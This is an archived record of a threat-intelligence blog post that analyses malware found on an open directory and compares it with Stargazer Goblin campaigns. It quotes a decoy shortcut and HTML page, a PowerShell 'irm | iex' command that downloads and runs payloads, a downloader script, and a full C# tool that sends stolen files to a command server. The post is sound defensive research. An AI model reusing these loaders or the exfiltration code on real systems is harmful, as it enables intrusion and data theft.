{
	"id": "e618393e-42cb-4adc-84e7-8999b22a7094",
	"created_at": "2026-04-06T00:17:52.574575Z",
	"updated_at": "2026-04-10T03:33:20.83899Z",
	"deleted_at": null,
	"sha1_hash": "1cd2e5ea93d69a62297b497a2761cd64b32413ae",
	"title": "Echoes of Stargazer Goblin: Analyzing Shared TTPs from an Open Directory | Hunt.io",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 760721,
	"plain_text": "Echoes of Stargazer Goblin: Analyzing Shared TTPs from an Open Directory | Hunt.io\r\nPublished: 2024-09-24 · Archived: 2026-04-05 16:36:01 UTC\r\nIntroduction\r\nSpecial thanks to Matthew from our team for his sharp eye in identifying this open directory, which set the stage for our investigation.\r\nOpen directories often offer a unique glimpse into how threat actors craft their campaigns and target networks, providing defenders with critical insights into their evolving TTPs.\r\nRecently, we encountered files exposed on a server that revealed attack methods remarkably similar to those used by the threat actor group Stargazer Goblin. Like the campaigns of that group, first identified by CheckPoint Research, the files we'll discuss below used .hta and .bin files, and PowerShell to inject shellcode into legitimate processes to deliver malware.\r\nThis post will explore these overlaps in code and tactics, recognizing that while CheckPoint's reporting and the directory we found share a striking resemblance, further evidence is needed before any definitive attribution can be made.\r\nA Chance Discovery: The Open Directory That Prompted Our Investigation\r\nSometimes, the most unexpected clues into a threat actor's operations come from the least likely places. Our team uncovered an open directory at 52.156.24[.]251:80 during a routine sweep of exposed assets across the Hunt platform. At first glance, the directory appeared to be yet another forgotten repository on the outskirts of the web. 
However, several files named after a published book on graphic design with extensions like .bin, .hta, and pdf.url caught our eye.\r\nFigure 1: Screenshot of the open directory in Hunt.\r\nUpon closer inspection, the directory's contents revealed patterns similar to those seen in recently reported threat activity. The .hta and HTML files, packed with obfuscated VBScript designed to download additional files, closely mirror the\r\nhttps://hunt.io/blog/echoes-of-stargazer-goblin-analyzing-shared-ttps-from-an-open-directory\r\nPage 1 of 11\n\nmethods attributed to Stargazer Goblin.\r\nThis discovery pointed to the possibility of a deliberate malware distribution campaign by a sophisticated actor. Driven by these findings, we decided to investigate further, uncovering additional parallels, which will be covered in the following sections.\r\nBrief Analysis of Files Found on the Server\r\nSeveral files in the directory are named after \"Logo Modernism,\" a book by Jens Müller and R. Roger Remington, suggesting an attempt to blend in with legitimate content related to graphic design. Within the /lr folder, we discovered three randomly named binary files, a benign executable named pdfreader.exe, and a compressed file, Archive.zip.\r\nFigure 2: Contents of /lr folder.\r\nExtracting Archive.zip resulted in several PDFs of seemingly legitimate books on graphic design, aligning with the \"Logo Modernism\" theme. Logo_Modernism.pdf.url, a deceptive shortcut disguised as a PDF, was also included in the folder. Although the double-extension file does not have an icon, we can hypothesize that it serves as a lure to execute commands and gain initial access.\r\nFigure 3: Contents of Archive.zip including Logo_Modernism.pdf.url.\r\nAdditionally, the directory contained two other files, which raised red flags. 
The first, become.txt, contains PowerShell code with variable naming conventions identical to those documented in the CheckPoint report, suggesting a possible connection or an attempt to emulate Stargazer Goblin.\r\nThe second file, code.ps1, consists of a highly obfuscated PowerShell script that, once decoded, reveals a data exfiltration tool that communicates with a private IP address. We can assess with a high degree of certainty that, when combined, these artifacts are likely part of a broader malicious operation.\r\nUnpacking the Attack Flow\r\nIn the last section, we identified the Logo_Modernism.pdf.url file as the likely method for initial access. We can assume the zip file is delivered through phishing or a drive-by download.\r\nThis campaign leads to the open-source emulation framework Sliver C2, which differs from the predominant stealer malware identified in the above report.\r\nTo better understand how these files function within the broader attack, we mapped out the attack flow to show the steps taken to infect networks. 
The diagram below shows each component, beginning with the .url file disguised as a PDF.\r\nFigure 4: Attack flow diagram.\r\nLogo_Modernism.pdf.url reaches out to the open directory to download \"Logo_Modernism.html.\" The URL uses Unicode non-breaking spaces (%E2%A0%80), likely as padding to hide the file extension.\r\n[{000214A0-0000-0000-C000-000000000046}]\r\nProp3=19,0\r\n[InternetShortcut]\r\nIDList=\r\nURL=mhtml:http://52.156.24.251:80Logo_Modernism%E2%A0%80%E2%A0%80%E2%A0%80%E2%A0%80%E2%A0%80%E2%A0%80%E2%A0%80%E2%A0%80%E2%A0%80%E2%A0%8\r\nHotKey=0\r\nIconIndex=13\r\nIconFile=C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe\r\nLogo_Modernism.pdf.url\r\nThe downloaded HTML file opens a new browser window or tab and resizes the window to 1x1 pixels, making it almost impossible to see. An HTTP GET request is then made to https://cbmelipilla[.]cl/te/hhhh.php. The domain, likely compromised, is a legitimate site for a school in Chile. As of the time of writing, the PHP file was no longer available.\r\nIt's worth noting that CheckPoint also identified the use of PHP files on compromised WordPress sites to check the Referer header and check whether the IP address matched a deny list. 
Without examining the script, we can only assume the actor uses similar functionality here.\r\nAn HTA file hosted on the open directory is embedded in the webpage, which we'll describe next.\r\n\u003c!DOCTYPE html\u003e\r\n\u003chtml lang=\"en\"\u003e\r\n \u003chead\u003e\r\n \u003cscript\u003e\r\nwindow.open('', '_self', '');\r\nwindow.resizeTo(1, 1);\r\nvar xhr = new XMLHttpRequest();\r\nxhr.open('GET', 'https://cbmelipilla.cl/te/hhhh.php', true);\r\nxhr.onload = function() {\r\n};\r\nxhr.send();\r\nsetTimeout(function() {\r\nwindow.close();\r\n}, 5000000);\r\n\u003c/script\u003e\r\n\u003ciframe src=\"http://52.156.24.251:80/Logo_Modernism%E2%A0%80%E2%A0%80%E2%A0%80%E2%A0%80%E2%A0%80%E2%A0%80%E2%A0%80%E2%A0%80%E2%A0%80%E2%\r\n \u003c/head\u003e\r\n \u003c/body\u003e\r\n\u003c/html\u003e\r\nLogo_Modernism.html\r\nLogo_Modernism.hta (image below) defines an application named \"WelsonJS\" and makes the window non-resizable and minimized. The file contains XOR-obfuscated VBScript code that initializes three variables. Additionally, JavaScript is used to fetch an image, again related to graphic design, from th.bing.com, likely as a decoy while the malicious code runs.\r\nUpdate (14 Nov 2024): WelsonJS is a legitimate open-source project on GitHub designed to help developers build Windows applications using the built-in JavaScript engine.\r\nxhr.send();\r\n\u003c/script\u003e\r\n \u003ctitle\u003eWelcome to WelsonJS application\u003c/title\u003e\r\nfdsfdsfasdf1232\r\nLogo_Modernism.hta (excerpt)\r\nThe VBScript runs PowerShell commands that download and execute the code found within become.txt. 
The deobfuscated code is below:\r\nage34 = \"powershell irm http://52.156.24.251:80/become.txt | iex\"\r\nmaster68 = \"winmgmts:\\\\\\\\.\\\\root\\\\cimv2\"\r\nancient26 = \"Win32_Process\"\r\nDeobfuscated VBScript code within the .HTA file.\r\nbecome.txt consists of a PowerShell script designed to download the three .bin files and pdfreader.exe to the \\Temp directory and run the code. The activity is hidden by minimizing the console window.\r\nThe code in the text file, mainly the variable names, matches that used in a .NET injector described by CheckPoint.\r\n$crop213 = @'\r\n[DllImport(\"kernel32.dll\")]\r\npublic static extern IntPtr GetConsoleWindow();\r\n[DllImport(\"user32.dll\")]\r\npublic static extern bool ShowWindow(IntPtr hWnd, int nCmdShow);\r\n'@\r\nAdd-Type -MemberDefinition $crop213 -Namespace \"crumble542543\" -Name \"culture6546\"\r\n$danger5646 = [crumble542543.culture6546]::GetConsoleWindow()\r\n[crumble542543.culture6546]::ShowWindow($danger5646, 0)\r\n$webClient = New-Object System.Net.WebClient\r\n$tempPath = [System.IO.Path]::GetTempPath()\r\n$webClient.DownloadFile(\"http://52.156.24.251:80/lr/12bre356yh.bin\", \"$tempPath\"+\"12bre356yh.bin\")\r\n$webClient.DownloadFile(\"http://52.156.24.251:80/lr/12bre35yh.bin\", \"$tempPath\"+\"12bre35yh.bin\")\r\n$webClient.DownloadFile(\"http://52.156.24.251:80/lr/12wefre356yh.bin\", \"$tempPath\"+\"12wefre356yh.bin\")\r\n$webClient.DownloadFile(\"http://52.156.24.251:80/lr/pdfreader.exe\", \"$tempPath\"+\"pdfreader.exe\")\r\nSet-Location -Path \"$tempPath\"\r\n$p=\"$tempPath\"+\"pdfreader.exe\"\r\n\u0026 $p\r\nContents of become.txt\r\nThe three .bin files (12bre35yh.bin, 12bre356yh.bin, and 12wefre356yh.bin) contained shellcode generated by the donut project, a tool commonly used to load shellcode into memory while evading detection. 
As the contents were heavily obfuscated, direct analysis provided limited insights. To obtain more detailed information, we utilized Volexity's open-source tool, donut_decryptor, to extract the payloads.\r\nA brief description of each file after decryption is below:\r\nmod_12bre35yh.bin: A PyInstaller executable, minimally detected in VirusTotal (2/73).\r\nmod_12bre356yh.bin: A Sliver C2 component configured to connect to 52.156.24.251:8888.\r\nmod_12wefre356yh.bin: A Win32 executable with a low detection rate (2 out of 70 on VirusTotal).\r\nWe also examined the contents of code.ps1, a PowerShell script encoded using a bitwise XOR operation. Each character in the script was XORed with the hexadecimal value 0x4E (78 in decimal) to hide its malicious activity.\r\nBy applying a few lines of Python, we decoded the script, revealing the following:\r\necho 'using System;\r\nusing System.IO;\r\nusing System.IO.Compression;\r\nusing System.Net.Http;\r\nusing System.Security.Cryptography;\r\nusing System.Text;\r\nusing System.Threading;\r\nusing System.Threading.Tasks;\r\nclass Program\r\n{\r\nstatic async Task Main(string[] args)\r\n{\r\n string sourceFolderPath = @\"C:\\Users\\ra3ed\\OneDrive\\desktop\\sec-proj\\iphon14\";\r\n string compressedFilePath = @\"C:\\Users\\ra3ed\\OneDrive\\desktop\\sec-proj\\CompressedFile.zip\";\r\n string c2Url = \"http://10.162.221.3:63434\";\r\n const int delay = 5 * 60 * 1000;\r\n CompressFolder(sourceFolderPath, compressedFilePath);\r\n long fileSize = new FileInfo(compressedFilePath).Length;\r\n int chunkSize = (int)Math.Ceiling((double)fileSize / 5);\r\n await TransferFileInParts(compressedFilePath, c2Url, chunkSize, delay);\r\n}\r\nstatic void CompressFolder(string folderPath, string zipPath)\r\n{\r\n if (File.Exists(zipPath))\r\n {\r\n File.Delete(zipPath);\r\n }\r\n ZipFile.CreateFromDirectory(folderPath, 
zipPath);\r\n}\r\nstatic async Task TransferFileInParts(string filePath, string url, int chunkSize, int delay)\r\n{\r\n using (FileStream fileStream = new FileStream(filePath, FileMode.Open, FileAccess.Read))\r\n {\r\n long fileSize = fileStream.Length;\r\n int numberOfChunks = (int)Math.Ceiling((double)fileSize / chunkSize);\r\n for (int i = 0; i \u003c numberOfChunks; i++)\r\n {\r\n byte[] buffer = new byte[chunkSize];\r\n int bytesRead = fileStream.Read(buffer, 0, chunkSize);\r\n byte[] encryptedChunk = EncryptData(buffer, bytesRead);\r\n await UploadChunkHttpAsync(encryptedChunk, encryptedChunk.Length, url, i + 1);\r\n if (i \u003c numberOfChunks - 1)\r\n {\r\n await Task.Delay(delay);\r\n }\r\n }\r\n }\r\n}\r\nstatic byte[] EncryptData(byte[] data, int length)\r\n{\r\n byte[] key = Encoding.ASCII.GetBytes(\"Blu3Ranger\");\r\n byte[] encrypted = new byte[length];\r\n for (int i = 0; i \u003c length; i++)\r\n {\r\n encrypted[i] = (byte)(data[i] ^ key[i % key.Length]);\r\n }\r\n return encrypted;\r\n}\r\nstatic async Task UploadChunkHttpAsync(byte[] buffer, int bytesRead, string url, int partNumber)\r\n{\r\n using (var client = new HttpClient())\r\n {\r\n var requestUri = $\"{url}?part={partNumber}\";\r\n using (var content = new ByteArrayContent(buffer, 0, bytesRead))\r\n {\r\n content.Headers.ContentType = new System.Net.Http.Headers.MediaTypeHeaderValue(\"application/octet-stream\");\r\n using (var request = new HttpRequestMessage(HttpMethod.Post, requestUri))\r\n {\r\n request.Headers.Add(\"User-Agent\", \"Mozilla/5.0\");\r\n request.Headers.Add(\"Accept\", \"application/json\");\r\n request.Content = content;\r\n HttpResponseMessage response = await client.SendAsync(request);\r\n response.EnsureSuccessStatusCode();\r\n Console.WriteLine(\"Upload complete: \" + response.RequestMessage.RequestUri);\r\n }\r\n }\r\n }\r\n}\r\n}'\u003e12344.cs;\r\n
Contents of code.ps1\r\nThe decoded content contained C# code, a tool designed for data exfiltration. It encrypts chunks of data with the repeating XOR key \"Blu3Ranger\" and exfiltrates them to a private IP address using HTTP POST requests.\r\nNotably, on 13 September, the domain books.bluerangers[.]site began resolving to the same open directory server.\r\nDrawing Parallels: Echoes of Stargazer Goblin\r\nWhile our findings do not provide direct evidence of a link to the Stargazer Goblin group identified by CheckPoint Research, there are several notable similarities and differences between the tactics used in both cases. Our analysis highlights the following key points:\r\nSimilarities:\r\nTargeting Methodology: Our findings and the Stargazer Goblin report describe the use of phishing campaigns and malicious downloads to compromise victims, indicating a similar approach to initial access techniques.\r\nFile Types and Delivery Mechanisms: The open directory mirrors Campaign 1 in the CheckPoint report, utilizing a similar combination of files: HTML, .HTA files, obfuscated VBScript, PowerShell scripts, .NET code, and .bin files containing shellcode for malware delivery.\r\nVariable Naming in Malicious Scripts: The malicious VBScript in both cases uses similarly structured variable names (e.g., tired52 in the CheckPoint report versus age34 in the open directory), suggesting a possible effort to emulate or reuse known malicious coding patterns.\r\nDifferences:\r\nFile Handling and Execution: The file useless.txt from the Stargazers campaign adopts a stealthier technique by downloading a single file and executing it directly in memory, minimizing detection risks. In contrast, become.txt from the open directory takes a more rudimentary approach by downloading three binary files directly to disk, an action more likely to trigger 
alerts from standard security controls.\r\nLevel of Sophistication: Using less sophisticated tactics, such as dropping files to disk, combined with the data in code.ps1, suggests a potentially different threat actor profile. These differences, including folder paths in the PowerShell script referring to a sub-folder named \"sec-proj\" (possibly short for \"security project\"), lead us to consider the possibility that this could be a Red Team or another actor attempting to emulate the tactics of Stargazer Goblin.\r\nFinal Thoughts\r\nIn summary, while there are clear overlaps in tactics and techniques with those seen in the Stargazer Goblin campaigns, specific indicators, such as the absence of GitHub-based distribution or the use of less sophisticated file handling, make a direct attribution to Stargazer Goblin uncertain.\r\nThese similarities might reflect coincidence or an attempt by another actor to imitate known methods. Without additional evidence, any definitive connection remains speculative, highlighting the need for continued monitoring and analysis.\r\nNetwork Observables\r\nIP Address | ASN | Ports Open | Domain(s) | Notes\r\n52.156.24[.]251:80 | Microsoft Corporation | 22, 80, 443, 31337, 8888 | books.bluerangers[.]site | Open directory containing malicious files. Port 8888 served as the C2 for Sliver.\r\nHost Observables\r\nFile Name | SHA-256 Hash | Notes\r\nLogo_Modernism.hta | 5a782ed1af8a937f691391479e38fef11b9e3e48c7efec832f2e42e801ec5756 | Contains obfuscated VB script, which downloads become.t\r\nLogo_Modernism.html | a738e4deae350b369aef566558c430fa3a8ac52dbdcb1f27a676fde9f7db9cbe | Decoy HTML page with an iframe that downloads Logo_Modernism.ht\r\nLogo_Modernism.pdf.url | cdfb1afbd30b1eb484cc0e13caf2dd791429d8e9fbaedee77dce2a5a8e31e540 | Shortcut file which downloads Logo_Modernism.ht\r\nbecome.txt | 588abfb199a1f9a199c8cfe072b551f844289fd26d043b510915a4da8ed781f7 | PowerShell code to download .bin files and pdfreader.exe\r\ncode.ps1 | e64112efcfe916abad6d4c86b4cc14973e6f9b30694781190ca21d05b687029f | Data exfiltration tool communicating with private IP address on port 63434\r\n/lr/12bre356yh.bin | 44daec80b70c40d8a03b15d89ab8f85590551606063bc3b12a74498ac065cb44 | PyInstaller EXE\r\n/lr/12bre356h.bin | 808ff1ef0360c8c58a523eccf8a6107b9905393fea2384f58e05ee3cee15ded4 | Sliver malware\r\n/lr/12wefre356yh.bin | d63d4a50460b6797eb177dc9728ba6454853250d0ee3b0e50d7d9e32882bcf4b | Win32 EXE\r\n/lr/Archive.zip | bfe8d4bf3ccf26321b9af67fe7baa33d27a88e03aeee7369b00ed3724c8a451b | Zip file containing benign PDFs and malicious pdf.url file\r\nSource: https://hunt.io/blog/echoes-of-stargazer-goblin-analyzing-shared-ttps-from-an-open-directory",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://hunt.io/blog/echoes-of-stargazer-goblin-analyzing-shared-ttps-from-an-open-directory"
	],
	"report_names": [
		"echoes-of-stargazer-goblin-analyzing-shared-ttps-from-an-open-directory"
	],
	"threat_actors": [
		{
			"id": "e8dd54ac-a3fa-4496-8b17-a9360ad13927",
			"created_at": "2024-07-28T02:00:04.686094Z",
			"updated_at": "2026-04-10T02:00:03.680897Z",
			"deleted_at": null,
			"main_name": "Stargazer Goblin",
			"aliases": [],
			"source_name": "MISPGALAXY:Stargazer Goblin",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		}
	],
	"ts_created_at": 1775434672,
	"ts_updated_at": 1775792000,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/1cd2e5ea93d69a62297b497a2761cd64b32413ae.pdf",
		"text": "https://archive.orkl.eu/1cd2e5ea93d69a62297b497a2761cd64b32413ae.txt",
		"img": "https://archive.orkl.eu/1cd2e5ea93d69a62297b497a2761cd64b32413ae.jpg"
	}
}